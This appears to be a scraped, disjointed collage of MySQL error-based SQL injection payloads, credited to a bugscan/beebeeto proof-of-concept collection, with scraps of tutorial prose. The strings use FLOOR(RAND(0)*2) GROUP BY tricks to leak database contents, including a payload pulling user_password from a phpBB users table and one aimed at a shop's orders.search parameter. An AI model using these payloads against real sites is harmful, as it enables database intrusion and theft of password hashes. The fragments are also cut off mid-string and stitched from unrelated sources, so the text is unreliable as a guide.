poc from bugscan beebeeto (burnegg/poc on GitHub).
...FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- zcMP
Word Mocha search by letters: nturb+AND+(SELECT+9523+FROM(SELECT+COUNT(*),CONCAT(0x716b627a71,(SELECT+(ELT(9523=9523,1))),0x7170706b71,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a).
+and+(select+*+from+(select+*+from+information_schema.tables+join+information_schema.tables+x)a)--. Duplicate column name 'TABLE_CATALOG'. This will work almost as a limit, getting you column names one by one.
...(SELECT+(SELECT+user_password)+FROM+phpbb_users+LIMIT+22000,1),FLOOR(rand(0)*2))x+FROM+phpbb_users+GROUP+BY+x)
...Silkas+AND+(SELECT+2254+FROM(SELECT+COUNT(*),CONCAT(0x716b717671,(SELECT+(ELT(2254=2254,1))),0x7171706b71,FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a).
information_schema.tables group by x)a) and 1=1
/index.php?dispatch=orders.search%29+AND+%28SELECT+5361+FROM%28SELECT+COUNT(*),CONCAT%280x7171706271,(SELECT+
+or+1+group+by+concat_ws(0x7e,(select+concat(COLUMN1,0x7e,COLUMN2)+from+TABLENAME+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1--. Method 3. These here are harder methods of error based, that you shouldn't go into unless the ones above don't work.
SELECT * FROM news WHERE id_news = -1 OR 1=1. Thus, changing the input parameters by adding to them